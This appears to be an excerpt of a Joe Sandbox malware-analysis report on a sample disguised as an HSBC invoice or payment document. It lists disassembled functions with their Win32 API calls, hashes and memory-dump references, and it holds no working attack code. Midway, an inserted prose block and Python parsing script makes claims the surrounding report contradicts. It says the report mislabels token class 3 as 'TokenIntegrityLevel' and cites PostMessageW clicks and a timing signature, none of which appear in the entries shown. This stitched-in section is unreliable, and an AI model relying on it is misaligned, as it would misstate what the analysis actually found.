                    • Instruction Fuzzy Hash: 34215C75910265AFCB20DF388C48A6A3BA4FB05730B154629FD26D66E2E7309A50FB90
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ED9802
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9834
                    • __itow.LIBCMT ref: 00ED984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9874
                    • __itow.LIBCMT ref: 00ED9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                    • Instruction ID: 74e44f9187f45adb53c8bc92daba6bace42bbcf410938b0e69c4439aac26b01a
                    • Opcode Fuzzy Hash: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                    • Instruction Fuzzy Hash: F3210035B002046FDB14AA718C86EEE7BE8EF4AB14F041026FD05FB341D670DD46A791
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                    • SelectObject.GDI32(?,00000000), ref: 00E8135C
                    • BeginPath.GDI32(?), ref: 00E81373
                    • SelectObject.GDI32(?,00000000), ref: 00E8139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                    • Instruction ID: f769fbba0092325fe082c005ad41211150c705c7230d746b563b507d12ff8f18
                    • Opcode Fuzzy Hash: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                    • Instruction Fuzzy Hash: 4C215E7480030CEBDB11AF25DC047A97BB9FB22326F148266F818E65A0D3719896EB91
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                    • Instruction ID: c4e513e58648d3b9e232724f97b89aa81f60b3f0c6e4f87b85add8f0cb993994
                    • Opcode Fuzzy Hash: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                    • Instruction Fuzzy Hash: 0B0196716052277BD204A6215C42EEF77ACDF563E8F145152FD04FA343E661EE12D2E1
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00EE4D5C
                    • __beginthreadex.LIBCMT ref: 00EE4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 00EE4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EE4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EE4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                    • Instruction ID: 61a0fa92f1b38d6c6f399c4d7999f1df9220a80b0f0d4771434a95dc64493ae9
                    • Opcode Fuzzy Hash: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                    • Instruction Fuzzy Hash: 0C1104B690424CBBCB119FA99C08ADA7FACEB9A324F144265FD14E3290D6B18D4497A1
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                    • GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                    • RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 883493501-0
                    • Opcode ID: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                    • Instruction ID: 6c657d0ba45e4199025d7c4894d34a3c17918cbfb37a79da293a36b2b7c02953
                    • Opcode Fuzzy Hash: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                    • Instruction Fuzzy Hash: 0E016D71600208FFDB204FA6DD88D6B7BACFF89359720043AF849D2260DA329C05DA60
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                    • Instruction ID: 5e8dbebc6019772709c5bd966824ea2b084f61d1d0f4ab765fddd664a438b346
                    • Opcode Fuzzy Hash: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                    • Instruction Fuzzy Hash: BF012D36D00A5DDBCF10DFE9E8885EDBB79FB09715F401056E901B2540DB709558D7A1
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                    • Instruction ID: 715de3dc67fbb9e11dafa72a1e11b5548bd8272b1895f6184d9cb5e53fffcfc8
                    • Opcode Fuzzy Hash: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                    • Instruction Fuzzy Hash: 2CF06231205308AFEB200FA9DD8DE6B3BACFF89768B005426F945D6250CB71DC46EA60
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00ED8669
                    • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00ED8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00ED8682
                    • RtlAllocateHeap.NTDLL(00000000,?,TokenPrivileges), ref: 00ED8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00ED869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                    • Instruction ID: 8c82d4c91fc67f14b25a133d7a295819cc1e64c6a76792c48103806088504e1d
                    • Opcode Fuzzy Hash: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                    • Instruction Fuzzy Hash: C4F04F71200308BFEB211FA5EC88E673BACFF89768B100036F955D7250CA61D945EA60
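The entries above are easier to triage once their raw hex arguments carry names: the PostMessageW pair is WM_LBUTTONDOWN/WM_LBUTTONUP (a synthesised click), the QueryPerformanceCounter calls bracket a Sleep (the behaviour behind the report's "execution timing" signature), and the two GetTokenInformation calls are the usual size-probe-then-fill idiom, where the report's own label on class value 3 is wrong (3 is TokenPrivileges; TokenIntegrityLevel is 25). The Python below is an added example written for this page, not Joe Sandbox code: it parses entries of the shape shown here, names the constants from the Win32 SDK headers, and tags those three idioms. The sample text is constructed from lines in the report's format; the tag names and the WINDOW_LONG low-byte handling are this example's own choices.

```python
"""Parse the per-function 'APIs' listings of a Joe Sandbox report, resolve the Win32
magic numbers a triager would otherwise look up by hand, and tag notable call idioms."""
import re
from collections import namedtuple

# Constructed sample in the shape of the report's entries; the 'TokenIntegrityLevel'
# label on value 3 is reproduced exactly as the report prints it.
SAMPLE = """\
APIs
• GetWindowRect.USER32(?,?), ref: 00ED8F12
• PostMessageW.USER32(?,00000201,00000001), ref: 00ED8FBC
• PostMessageW.USER32(?,00000202,00000000), ref: 00ED8FD2
Memory Dump Source
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ED8669
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8673
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED869F
Memory Dump Source
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000), ref: 00EE5502
• Sleep.KERNEL32(00000000,?), ref: 00EE5518
• QueryPerformanceCounter.KERNEL32(?,?), ref: 00EE5522
Memory Dump Source
"""

# Values from the Win32 SDK headers (winuser.h, commctrl.h, winnt.h).
WINDOW_MESSAGES = {0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH",
                   0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
                   0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE"}
# GWL_* indices are negative (GWL_STYLE is -16); the report prints only their low byte.
WINDOW_LONG_INDEX = {0xF0: "GWL_STYLE", 0xEC: "GWL_EXSTYLE", 0xEB: "GWL_USERDATA"}
TOKEN_INFO_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 25: "TokenIntegrityLevel"}
# (API name, zero-based argument index) -> table that names that argument.
ARG_TABLES = {("SendMessageW", 1): WINDOW_MESSAGES, ("PostMessageW", 1): WINDOW_MESSAGES,
              ("GetWindowLongW", 1): WINDOW_LONG_INDEX, ("SetWindowLongW", 1): WINDOW_LONG_INDEX,
              ("GetTokenInformation", 1): TOKEN_INFO_CLASS}

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z][A-Z0-9]*)\b"
    r"(?:\((?P<args>.*)\))?(?:,? ref: (?P<ref>[0-9A-F]{8}))?\s*$")
HEX_RE = re.compile(r"^([0-9A-F]{8})(?:\(\w+\))?$")
Call = namedtuple("Call", "name module args ref subcall")


def split_args(text):
    """Split an argument list on top-level commas, keeping 'hex(label)' intact."""
    out, depth, cur = [], 0, ""
    for ch in text:
        if ch == "," and depth == 0:
            out.append(cur)
            cur = ""
            continue
        depth += (ch == "(") - (ch == ")")
        cur += ch
    return [a.strip() for a in out + [cur]] if text else []


def resolve(name, idx, raw):
    """Name a known constant from the SDK tables, replacing whatever label the report
    attached (it labels TOKEN_INFORMATION_CLASS 3 'TokenIntegrityLevel', which is 25)."""
    m, table = HEX_RE.match(raw), ARG_TABLES.get((name, idx))
    if not m or table is None:
        return raw
    value = int(m.group(1), 16)
    label = table.get(value & 0xFF if table is WINDOW_LONG_INDEX else value)
    return f"{m.group(1)}({label})" if label else m.group(1)


def parse_entries(report_text):
    """Return one list of Call per 'APIs' ... 'Memory Dump Source' block."""
    entries, current = [], None
    for line in report_text.splitlines():
        line = line.strip()
        if line == "APIs":
            current = []
        elif line == "Memory Dump Source":
            if current is not None:
                entries.append(current)
            current = None
        elif current is not None and (m := CALL_RE.match(line)):
            args = [resolve(m["name"], i, a) for i, a in enumerate(split_args(m["args"] or ""))]
            current.append(Call(m["name"], m["module"], args, m["ref"] or "", bool(m["sub"])))
    return entries


def classify(calls):
    """Tag the idioms worth a second look in one function's call sequence."""
    names = [c.name for c in calls if not c.subcall]
    msgs = [c.args[1] for c in calls if c.name in ("SendMessageW", "PostMessageW") and len(c.args) > 1]
    tags = []
    if names.count("GetTokenInformation") >= 2 and "GetLastError" in names:
        tags.append("token query: size probe, allocate, fill")
    if names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names:
        tags.append("high-resolution timing around Sleep")
    if any("WM_LBUTTONDOWN" in a for a in msgs) and any("WM_LBUTTONUP" in a for a in msgs):
        tags.append("synthesised mouse click")
    return tags


if __name__ == "__main__":
    for calls in parse_entries(SAMPLE):
        print(classify(calls), [f"{c.ref} {c.name}({', '.join(c.args)})" for c in calls])
```

Feed it the text of any "APIs" block from this report (or a whole exported report) and it prints each function's tags beside the relabelled calls. The subcall lines ("Part of subcall function ...") are kept but excluded from sequence matching, because they belong to a callee, not to the function the entry describes.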
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00EDC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EDC6D1
                    • MessageBeep.USER32(00000000), ref: 00EDC6E9
                    • KillTimer.USER32(?,0000040A), ref: 00EDC705
                    • EndDialog.USER32(?,00000001), ref: 00EDC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                    • Instruction ID: c01cb00878e31f2eea7425bdf5d3cc60148d945a12fd4c834509ab099e271694
                    • Opcode Fuzzy Hash: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                    • Instruction Fuzzy Hash: 4801A230400309ABEB315B20DD4EF9677B8FF04B45F14166AF586B15E0DBE1A959DF80
                    APIs
                    • EndPath.GDI32(?), ref: 00E813BF
                    • StrokeAndFillPath.GDI32(?,?,00EBBAD8,00000000,?), ref: 00E813DB
                    • SelectObject.GDI32(?,00000000), ref: 00E813EE
                    • DeleteObject.GDI32 ref: 00E81401
                    • StrokePath.GDI32(?), ref: 00E8141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                    • Instruction ID: 5b86d4a05ec0e1a3e682bde979b2ad92ad32568e4435a7e425f3a7469317306b
                    • Opcode Fuzzy Hash: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                    • Instruction Fuzzy Hash: A8F0C97400470CEBDB226F26EC0C7583BA9BB22326F04D264E82D959F1C731499AEF51
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ED8E7F
                    • CloseHandle.KERNEL32(?), ref: 00ED8E94
                    • CloseHandle.KERNEL32(?), ref: 00ED8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00ED8EA5
                    • HeapFree.KERNEL32(00000000), ref: 00ED8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                    • String ID:
                    • API String ID: 3751786701-0
                    • Opcode ID: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                    • Instruction ID: f6fb7602b89906ccef6407152ae8ed2f2a46ab68a82b4ff777b5f62a13e73014
                    • Opcode Fuzzy Hash: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                    • Instruction Fuzzy Hash: 66E0E536004209FBDB215FE1EC0C90ABF79FF89722B108230F219C1870CB329468EB90
                    APIs
                      • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                      • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00E87BB1: _memmove.LIBCMT ref: 00E87C0B
                    • __swprintf.LIBCMT ref: 00E9302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E92EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: c40e0f577de1b53299b4cf10ba4469c7778f7f0d1da8656e8c8f1956b5f5149d
                    • Instruction ID: 952340995fd7ecb3f133c2ae0d1adc7de5b7d7984de8d4ff0d3e80496a0a7d28
                    • Opcode Fuzzy Hash: c40e0f577de1b53299b4cf10ba4469c7778f7f0d1da8656e8c8f1956b5f5149d
                    • Instruction Fuzzy Hash: 2D917B312083419FCB18EF24D985D6FB7E5EF85744F00295DF49AAB2A1DB20EE45CB52
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00EA52DD
                      • Part of subcall function 00EB0340: __87except.LIBCMT ref: 00EB037B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
